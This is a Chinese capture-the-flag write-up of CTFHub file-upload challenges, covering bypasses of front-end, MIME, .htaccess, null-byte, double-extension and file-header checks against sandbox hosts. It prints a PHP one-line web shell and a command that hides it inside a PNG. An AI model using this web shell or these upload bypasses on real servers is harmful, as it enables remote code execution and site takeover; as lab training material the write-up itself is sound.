ctfhub文件上传

⽆验证

上传⼀句话⽊⻢,发现上传成功

复制代码
1.php ⼀句话⽊⻢内容:
<?php @eval($_POST[cmd]);?>

上传⼀句话⽊⻢,发现上传成功

复制代码
http://challenge-8b27d18368ecc25c.sandbox.ctfhub.com:10800/upload/1.ph
p

前端验证

开启题⽬

上传⼀个 1.jpg,内容是

复制代码
<?php @eval($_POST[cmd]);?>

上传抓包,修改后缀为 php

放包,上传成功

蚁剑连接

复制代码
http://challenge-3c592a81e5b9e7a6.sandbox.ctfhub.com:10800/upload/1.ph
p

在/var/www/html/flag_2925720673.php找到flag

.htaccess

先上传.htaccess

再上传1.jpg

蚁剑连接

注意是1.jpg不是1.php

复制代码
http://challenge-dc29f7e0bd8df3ff.sandbox.ctfhub.com:10800/upload/1.jpg

得到flag

MIME 绕过

上传2.jpg抓包修改为2.php

蚁剑连接

00 截断

上传2.php抓包并修改成如下图所示

蚁剑连接

双写绕过

抓包修改成如下所示

蚁剑连接

⽂件头检测

命令行以管理员身份运行

png照片可截图获得,不可通过改文件后缀获得

且必须在文件所在目录下

复制代码
copy 2.png/b + 2.php/a 3.png

上传3.png并抓包修改

蚁剑连接

相关推荐
文刀竹肃4 小时前
Masscan工具详解
安全·网络安全
NewCarRen6 小时前
适用于低流量和高流量场景的车载自组织网络认证与验证方案
网络安全·汽车网络安全
眠晚晚8 小时前
漏洞发现笔记分享
笔记·web安全·网络安全
QZ166560951598 小时前
如何统一管理纷繁复杂的后端API?—— 解析API网关的关键作用
网络安全
GZ_TOGOGO11 小时前
网络安全认证考取证书有哪些?
安全·web安全·网络安全·cisp
JM丫13 小时前
buuctf-ciscn_2019_c_1
网络安全·ctf
重生之我在番茄自学网安拯救世界13 小时前
网络安全中级阶段学习笔记(一):DVWA靶场安装配置教程与网络空间搜索语法
笔记·学习·网络安全·靶场·dvwa·fofa·google hack
Whoami!14 小时前
❼⁄₅ ⟦ OSCP ⬖ 研记 ⟧ 查找漏洞的公共利用 ➱ 实操案例(下)
网络安全·信息安全·漏洞利用
小菜今天没吃饱15 小时前
DVWA-XSS(stored)
前端·网络安全·xss·dvwa
Bruce_Liuxiaowei16 小时前
[特殊字符] 安全日志分析的关键技术与知识体系
安全·网络安全